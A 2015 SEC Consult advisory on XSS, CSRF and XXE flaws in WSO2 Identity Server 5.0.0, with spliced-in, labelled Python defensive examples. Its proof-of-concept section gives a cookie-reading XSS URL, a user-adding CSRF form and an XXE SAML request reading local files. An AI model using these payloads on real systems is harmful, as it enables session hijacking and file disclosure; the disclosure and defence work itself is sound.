WSO2 Identity Server 5.0.0 XSS / CSRF / XXE Injection

13 May 2015 | Reported by Wolfgang Ettlinger | Source: packetstorm (packetstormsecurity.com)

WSO2 Identity Server 5.0.0 vulnerabilities with XSS, CSRF, XXE Injection

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
SEC Consult Vulnerability Lab Security Advisory < 20150513-0 >  
=======================================================================  
title: Multiple critical vulnerabilities  
product: WSO2 Identity Server  
other WSO2 Carbon based products may be affected too  
vulnerable version: 5.0.0 (WSO2 Carbon Framework v4.2.0 patch1095)  
fixed version: 5.0.0 with patches 1194 and 1095 applied  
CVE number:  
impact: critical  
homepage: http://wso2.com/products/identity-server/  
found: 2015-02-19  
by: W. Ettlinger (Office Vienna)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Berlin - Frankfurt/Main - Montreal - Singapore  
Vienna (HQ) - Vilnius - Zurich  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
- -------------------  
"WSO2 Identity Server provides sophisticated security and identity management  
of enterprise web applications, services, and APIs, and makes life easier for  
developers and architects with its hassle-free, minimal monitoring and  
maintenance requirements. In its latest version, Identity Server acts as an  
Enterprise Identity Bus (EIB) — a central backbone to connect and manage  
multiple identities regardless of the standards on which they are based."  
  
URL: http://wso2.com/products/identity-server/  
  
Business recommendation:  
- ------------------------  
The WSO2 Identity Server has three security vulnerabilities that allow an  
attacker to take over administrative user sessions and read arbitrary  
local files. Moreover, the XXE vulnerability potentially allows an  
attacker to conduct further attacks on internal servers since the  
vulnerability may allow an attacker to bypass firewall rules.  
  
SEC Consult only conducted a very quick and narrow check on the  
WSO2 Identity Server. Since in this check a critical vulnerability was  
found, SEC Consult suspects that the Identity Server contains even  
more critical vulnerabilities.  
  
Since other WSO2 products are based on the same framework (WSO2 Carbon  
Framework), it is possible that these or similar vulnerabilities affect  
other products too.  
  
SEC Consult recommends not using any products based on the WSO2 Carbon  
Framework until a thorough security review has been conducted.  
  
  
Vulnerability overview/description:  
- -----------------------------------  
1) Reflected cross-site scripting (XSS, IDENTITY-3280)  
The WSO2 Identity Server is vulnerable to reflected cross-site scripting.  
An attacker can lure a victim who is logged in on the Identity Server  
administration web interface into e.g. clicking on a link, and thereby  
take over the victim's session.  
  
2) Cross-site request forgery (CSRF, IDENTITY-3280)  
On at least one web page, CSRF protection has not been implemented. An  
attacker on the internet could lure a victim who is logged in on the  
Identity Server administration web interface onto a web page containing,  
e.g., a manipulated <img> tag. The attacker is then able to add arbitrary  
users to the Identity Server.  
  
3) XML external entity injection (XXE, IDENTITY-3192)  
An unauthenticated attacker can use the SAML authentication interface to  
inject arbitrary external XML entities. This allows an attacker to read  
arbitrary local files. Moreover, since the XML entity resolver allows  
remote URLs, this vulnerability may allow an attacker to bypass firewall  
rules and conduct further attacks on internal hosts.  
  
  
Proof of concept:  
- -----------------  
1) Reflected cross-site scripting (XSS, IDENTITY-3280)  
When opening the following URL an alert-box is shown as an example:  
http://<host>:9443/carbon/user/change-passwd.jsp?isUserChange=true&returnPath=../userstore/index.jsp%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
  
When a user without permission to create other users issues the following  
request, an alert-box is shown:  
- ---- snip ----  
POST /carbon/user/add-finish.jsp HTTP/1.1  
Host: <host>:9443  
Cookie: <cookies>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 261  
  
pwd_primary_null=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_primary_null=%5E%5B%5CS%5D%7B3%2C30%7D%24&pwd_PRIMARY=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_PRIMARY=%5E%5B%5CS%5D%7B3%2C30%7D%24&domain=PRIMARY&username=secconsult&passwordMethod=defineHere&password=test123&retype=test123  
- ---- snip ----  
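The `returnPath` reflection above works because the parameter lands unchanged inside an HTML attribute, so a `"` closes the attribute and `>` closes the tag. The following is an added example (not code from the advisory or from WSO2) of how a page handler can close that gap: validate the parameter against a conservative character allowlist and encode it for the attribute context when it is rendered. The regex, the default path and the handler names are assumptions for illustration; only the payload string comes from the advisory.

```python
"""Added example: validate and attribute-encode a reflected returnPath parameter."""
import html
import re
from urllib.parse import unquote

# Assumption: only relative .jsp paths inside the console are legitimate return
# targets. Quotes, angle brackets, ':' and whitespace are not in the allowed set,
# so an attribute break-out cannot pass validation in the first place.
RETURN_PATH_RE = re.compile(r"^(\.\./)*[A-Za-z0-9_\-]+(/[A-Za-z0-9_\-]+)*\.jsp$")
DEFAULT_RETURN = "../userstore/index.jsp"   # assumed fallback page

# The reflected value from the advisory's proof-of-concept URL (URL-encoded form).
ADVISORY_PAYLOAD = (
    "../userstore/index.jsp%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"
)


def sanitize_return_path(raw: str) -> str:
    """Decode the parameter once and accept it only if it matches the allowlist."""
    value = unquote(raw)
    if RETURN_PATH_RE.fullmatch(value):
        return value
    return DEFAULT_RETURN


def attr_encode(value: str) -> str:
    """Encode for a double-quoted HTML attribute: ", <, >, & become entities."""
    return html.escape(value, quote=True)


def render_return_field(return_path: str) -> str:
    """Defence in depth: validation first, then contextual output encoding."""
    safe = sanitize_return_path(return_path)
    return '<input type="hidden" name="returnPath" value="%s">' % attr_encode(safe)


if __name__ == "__main__":
    print(render_return_field(ADVISORY_PAYLOAD))
    print(render_return_field("../userstore/index.jsp"))
```

Either layer alone would stop this particular payload; keeping both means a later change to the allowlist does not silently reintroduce the attribute break-out.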
  
2) Cross-site request forgery (CSRF, IDENTITY-3280)  
The following HTML fragment demonstrates this issue:  
- ---- snip ----  
<form method="POST" action="https://<host>:9443/carbon/user/add-finish.jsp">  
<input type="text" name="domain" value="PRIMARY"/>  
<input type="text" name="username" value="secconsult"/>  
<input type="text" name="password" value="test123"/>  
<input type="submit"/>  
</form>  
- ---- snip ----  
  
3) XML external entity injection (XXE, IDENTITY-3192)  
After issuing the following request to a vulnerable Windows server,  
the contents of the C: drive are returned:  
  
- ---- snip ----  
<?xml version="1.0"?>  
<!DOCTYPE AuthnRequest [  
<!ELEMENT AuthnRequest ANY >  
<!ENTITY xxe SYSTEM "file:///C:/" >]>  
<samlp:AuthnRequest  
xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"  
Destination="https://<host>/samlsso"  
ID="_ffffffff-0000-0000-0000-ffffffffffff"  
IssueInstant="2015-01-01T01:01:01Z"  
ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"  
Version="2.0">  
<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">  
XXXX&xxe;YYYY  
</saml:Issuer>  
<samlp:NameIDPolicy AllowCreate="true"  
Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/>  
</samlp:AuthnRequest>  
- ---- snip ----  
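The request above only works because the SAML endpoint's XML parser honours the inline DTD and resolves the `SYSTEM` entity. A SAML AuthnRequest never legitimately carries a DOCTYPE, so the simplest fix is to reject any document that declares one before a single entity is resolved. The following is an added example (not code from the advisory or from WSO2) of that check, written with Python's stdlib expat bindings; the sample documents are constructed for the example, with the hostile one modelled on the advisory's proof of concept, and the `parse_issuer` / `accepts` names are assumptions.

```python
"""Added example: refuse DTDs and entity declarations in inbound SAML messages."""
import xml.parsers.expat

SAML_ASSERTION_NS = "urn:oasis:names:tc:SAML:2.0:assertion"

# Constructed benign AuthnRequest (no DOCTYPE).
BENIGN_AUTHN_REQUEST = b"""<?xml version="1.0"?>
<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    Destination="https://idp.example/samlsso" ID="_1"
    IssueInstant="2015-01-01T01:01:01Z" Version="2.0">
  <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">sp.example</saml:Issuer>
</samlp:AuthnRequest>"""

# Constructed sample modelled on the advisory's proof of concept.
XXE_AUTHN_REQUEST = b"""<?xml version="1.0"?>
<!DOCTYPE AuthnRequest [
<!ELEMENT AuthnRequest ANY >
<!ENTITY xxe SYSTEM "file:///C:/" >]>
<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" Version="2.0">
  <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">XXXX&xxe;YYYY</saml:Issuer>
</samlp:AuthnRequest>"""


class UnsafeXml(ValueError):
    """Raised as soon as the parser meets a DOCTYPE or an entity declaration."""


def parse_issuer(doc: bytes) -> str:
    """Return the Issuer text of an AuthnRequest, or raise UnsafeXml on any DTD."""
    parser = xml.parsers.expat.ParserCreate(namespace_separator="}")
    issuer_name = SAML_ASSERTION_NS + "}Issuer"
    state = {"in_issuer": False, "text": []}

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXml("DOCTYPE declarations are not accepted in SAML messages")

    def reject_entity(*_args):
        raise UnsafeXml("entity declarations are not accepted")

    def reject_external(*_args):
        raise UnsafeXml("external entity references are not accepted")

    def start(name, attrs):
        if name == issuer_name:
            state["in_issuer"] = True

    def end(name):
        if name == issuer_name:
            state["in_issuer"] = False

    def chars(data):
        if state["in_issuer"]:
            state["text"].append(data)

    # The DTD hooks fire before any entity could be resolved, so the file URI
    # in the hostile sample is never opened.
    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(doc, True)
    return "".join(state["text"]).strip()


def accepts(doc: bytes) -> bool:
    """True if the message parses cleanly, False if it was rejected as unsafe."""
    try:
        parse_issuer(doc)
        return True
    except UnsafeXml:
        return False


if __name__ == "__main__":
    print(accepts(BENIGN_AUTHN_REQUEST), accepts(XXE_AUTHN_REQUEST))
```

For the Java parsers a Carbon-based product actually uses, the equivalent switch on a `DocumentBuilderFactory` is `setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)`, which makes the parser throw on any DOCTYPE before entity resolution; disabling external general and parameter entities is a weaker fallback where a DTD must be tolerated.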
  
  
Vulnerable / tested versions:  
- -----------------------------  
The version 5.0.0 (with WSO2 Carbon Framework v4.2.0 patch1095 applied)  
was found to be vulnerable. This was the latest version at the time  
of discovery.  
  
  
Vendor contact timeline:  
- ------------------------  
2015-03-19: Contacting vendor through [email protected]  
2015-03-19: Security contact confirms retrieval of the E-Mail  
2015-03-19: Security contact says that he has trouble opening the attached PDF  
document  
2015-03-19: Sending Responsible Disclosure Policy in plain text  
2015-03-20: Security contact states he actually was unable to decrypt the  
advisory  
2015-03-22: Sending security advisory again  
2015-03-22: Security contact confirms retrieval of the advisory  
2015-03-26: Security contact acknowledges existence of the vulnerabilities  
2015-04-10: Asking for an update on the current status and which products and  
versions are affected  
2015-04-10: Security contact: XSS vulnerabilities are fixed in the code,  
fixing CSRF is in progress,  
Identity Server 5.0.0 is vulnerable  
2015-04-13: Asking whether the patches will be released before the latest  
possible release date; asking for the status of the XXE  
vulnerability and whether other products based on Carbon are  
affected  
2015-04-13: Advisory can be released on 2013-05-07, release notes will mention  
the affected products  
2015-05-04: Asking for current status  
2015-05-04: Security contact: patches will be released in the next couple of  
days  
2015-05-05: Security contact asks to delay the release of the advisory to  
2013-05-13  
2015-05-05: Confirming the new release date  
2015-05-05: Asking to give credit in the release notes to the patch  
2015-05-13: Public release of the advisory  
  
  
Solution:  
- ---------  
Apply the following patches to mitigate these issues:  
* WSO2-CARBON-PATCH-4.2.0-1194  
* WSO2-CARBON-PATCH-4.2.0-1095  
  
See the following pages for more information:  
https://wso2.org/jira/browse/IDENTITY-3280  
https://wso2.org/jira/browse/IDENTITY-3192  
  
The patches can be downloaded at  
http://wso2.com/products/identity-server/  
  
Workaround:  
- -----------  
None.  
  
  
Advisory URL:  
- -------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/Career.htm  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF W. Ettlinger / @2015  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.9 (MingW32)  
  
iQIcBAEBAgAGBQJVUx2MAAoJEC0t17XG7og/H/4QAIiwOLbldpFKkJwemTc5qxeu  
LSIgJjMy9Yz7HZtu1c65QAPJQ6B+VduU+bN3Lt10AHAWYPTtyjFlQzq4MrcUWaY8  
XiO4pA4nYykki9F8QUp1cBX9bfzihqHR/1+sqELJ/ueiz8U4wzUPW31UehTdjV26  
d+SZ0FdVPi1BlJb3Ex0ejkxkDB4a9kVYswxu0zti8oZcaXZ++TYdCssssAaA+Vu4  
aPErIQMfaXSoeZlJS7f8TYRRR9p2fVJBsXr29CgG9GJBz0DMExF8AKZ+Ve0EJd8u  
y2mKPwJgtzLN7Crw1YfD6YoSaTbygdDqFs208VDwAEP5Gh7N19ylhpUdJkgKk56l  
jzo+DmqVt9j5R2gu1Nc8+3ienuQ9v6xs5WlOWJC5/2Gh9ngOH31jEZTG2oqjLDxW  
pqsXnqG6FEW1qbbB+UCebI3bseqLGJJQQVqYeENh9zX1m82PTuRy9QQDcyXlzl4q  
hZksURglFjGwwgahTgR8LVO5kAivqbsahp/IojxSwc0DnceC8NJjYE/qprv+NOG0  
2sud3X9AhrlJcwfNMWb795Jgv2fDjox1yu8Noga67a2muz9UwbTJXZKSyn32IpEe  
aYQtgSXTT0YaidP7HDUcsuTIhGczL8PGilDCuNRDy2UF0eFHqaj1d9Ou9QSturnn  
wu/AhxURurrsfOEg1TMs  
=iuLH  
-----END PGP SIGNATURE-----  
